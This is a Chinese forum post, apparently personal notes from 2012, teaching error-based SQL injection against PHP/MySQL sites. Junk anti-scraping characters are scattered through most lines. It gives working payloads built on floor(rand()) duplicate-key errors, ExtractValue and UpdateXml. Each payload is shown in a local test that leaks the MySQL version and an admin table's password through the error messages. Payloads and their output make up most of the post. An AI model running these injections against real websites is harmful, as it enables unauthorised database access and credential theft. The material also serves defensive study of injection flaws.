放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。4 A6 X4 t8 O9 v$ A$ v- `4 d3 W
实际测试环境:; M1 e6 i: O4 ?% V* f& I) l% j$ O
) g P1 q |. n5 \
% e8 E' L& z$ X) s
mysql> show tables;' q/ W4 G" Q7 o6 j$ Q: ?3 Y2 B; F
+----------------+
. Z- v; c# K% F2 b f| Tables_in_test |: T3 P& o; q3 V6 o: D: d
+----------------+
0 ]& V3 t! m3 C| admin |
* A2 L* S' y) e: n| article |
~( L* P' T/ |1 W( _" X6 R" {+----------------+
" b) i$ [- K2 ]% ^3 ?7 \
" A7 K. A- z+ U; ? n/ W/ F
( i; ~* N0 c9 b4 m# o: A K
6 {0 `" Q! O7 S4 z) d0 Z# zmysql> describe admin;
3 a$ H! V( D2 f Q! x+-------+------------------+------+-----+---------+----------------+: h2 |3 o) J4 l; t# Y
| Field | Type | Null | Key | Default | Extra |
1 O+ J4 D9 }0 X+-------+------------------+------+-----+---------+----------------+
/ K, Z3 K% Z- V, z' B" U| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
. c: q0 F7 V) M- O| user | varchar(50) | NO | | NULL | |- t5 Y O- A1 x3 K6 Y. h
| pass | varchar(50) | NO | | NULL | |
% X* z' k& o* v5 d2 t+-------+------------------+------+-----+---------+----------------+" O5 z; l# S& t" }; G! L
$ s" _& t! m9 G' K/ ?" m! j9 B
9 T$ Q7 A1 u6 P+ W
P, e3 t& h' W# m& s6 _) O
mysql> describe article;( Y3 S- U5 W/ r2 B- \! A% W$ Y
+---------+------------------+------+-----+---------+----------------+
2 V% s- M$ p" @9 i| Field | Type | Null | Key | Default | Extra |2 m0 y5 W b y. k& m2 e
+---------+------------------+------+-----+---------+----------------+
% G; l1 B. Q& p& j3 O| id | int(10) unsigned | NO | PRI | NULL | auto_increment |# ~ {' o/ P* v3 J8 d8 Y# [2 _
| title | varchar(50) | NO | | NULL | |6 A* |4 m- O$ c. T7 v. E
| content | varchar(50) | NO | | NULL | |; o4 _' h W3 N! U
+---------+------------------+------+-----+---------+----------------+) ^8 b" k. z4 l$ t: ~) z
1、通过floor报错1 J8 B8 Z" `9 y6 f0 M4 D
可以通过如下一些利用代码
% |; c( v4 |: I0 o( U; q0 Y
& y% y' \3 M; e& e
8 t ^7 D" b1 L! x+ P: D& Aand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x/ \0 A: ?& b J0 j
from information_schema.tables group by x)a);; }0 D% j- y% W
& F B. W' z2 ` A( y" a
& ~+ A. V% j$ K# j6 e# x
and (select count(*) from (select 1 union select null union select !1)x
% T) {" x1 M" U% A2 Ngroup by concat((select table_name from information_schema.tables limit 1),
# v3 M, D: ` b: u0 p" Mfloor(rand(0)*2)));
7 g) q6 m4 \+ w ?2 v举例如下:; C; P4 g; |! v7 ^" |& g# ^
首先进行正常查询:% b _8 D1 L4 r0 z8 L; c0 ^9 m
0 z$ S0 J: v0 K/ R4 Imysql> select * from article where id = 1;0 ?' e8 |+ D) H9 D
+----+-------+---------+. ?" E! `" W9 K8 F# S
| id | title | content |
& G9 k% L, G' o/ T% {+----+-------+---------+
- E/ ^( {) s0 S: m| 1 | test | do it |* t- Y2 ?2 T3 \2 h
+----+-------+---------+
: H- U$ l: f0 @ W+ i假如id输入存在注入的话,可以通过如下语句进行报错。4 c5 i# G6 i, }) V! G
2 @% k8 v( |3 ]7 b" Y6 f% x
5 X; H, h6 @$ ?mysql> select * from article where id = 1 and (select 1 from
( o) ^1 w" d% U; B/ \" |4 j(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);& D/ ` D' D. ]8 J! t6 N a0 X; ^
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
3 k p& A+ q8 [, t" \可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
9 M* C/ D5 _! ]: j* X6 b例如我们需要查询管理员用户名和密码:
8 R/ h# i& Z% gMethod1:7 s# F3 G2 q" O! x: }
! n! Y8 G$ _6 D" Q: ^7 |! h
3 k/ ~: z# v' X( ?8 Fmysql> select * from article where id = 1 and (select 1 from
- M1 f; ?0 ?) \/ n) t8 w" n% o(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x, Y- u& B. Q5 H( o6 ]& P/ H
from information_schema.tables group by x)a);
7 G( w1 i2 @7 Z$ o( cERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
7 p$ q/ L1 b& F% A2 e* Q$ T0 iMethod2:& f8 h: ]( Y2 N. F
: `5 ^7 g7 {0 C \ % `7 Q* n/ V8 N& _% W
mysql> select * from article where id = 1 and (select count(*)
j D1 x8 B! j0 m) L' kfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
3 k8 v2 o6 T, ?2 X/ Y- Rfloor(rand(0)*2)));$ x4 j; O" ?) [2 w9 s
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
! k8 n; w1 B1 c' \0 r& J* u; U( x# B! Z2、ExtractValue* \+ t% X) a$ q8 u1 S9 u/ ?) W
测试语句如下
9 Q$ R& m; H1 ^ * R2 j9 C* g3 Q3 X
' c% i( W5 h+ {and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));; }5 o- L0 f6 @# Z: O3 p
实际测试过程! ^0 d8 d% ^: p& x
9 q& Y' [! f9 [& J; a' H7 e3 b1 D
3 d F# L+ X' Y/ j, e) B9 A! Y) x5 n
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
/ s' i- `8 e9 X4 s, a9 o1 A3 a! o- T& |(select pass from admin limit 1)));--" d4 K" Y' j3 F7 I, t; `
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
: A7 e! G, `$ w& j3、UpdateXml) D" E4 F' e" e1 n5 O r# h* U
测试语句# J9 `" e; i" Y7 v0 a6 t
' g/ H' u; @. z: ?6 [, j
" E4 H; f4 R0 ^( ?, M) y( fand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))- R! E% E8 |' q6 c1 w
实际测试过程+ M [8 I( r# ?/ e9 u
: J, X9 B' ~1 M% l3 n" h. I
1 y9 R7 b% { ^" \mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
& [9 B* p. w. _1 W(select pass from admin limit 1),0x5e24),1));
7 [' C, q5 U% ^# X+ ~5 n/ jERROR 1105 (HY000): XPATH syntax error: '^$admin888^$': i4 v9 e/ x& P0 s4 B
All, thanks foreign guys.- W) Z" A" u; v) c: }7 L7 ^
7 Z3 Q- o. Y4 ]
; a) D, k$ I! ^* V) H# k |
发表于 2012-12-10 10:28:51
收藏
支持
反对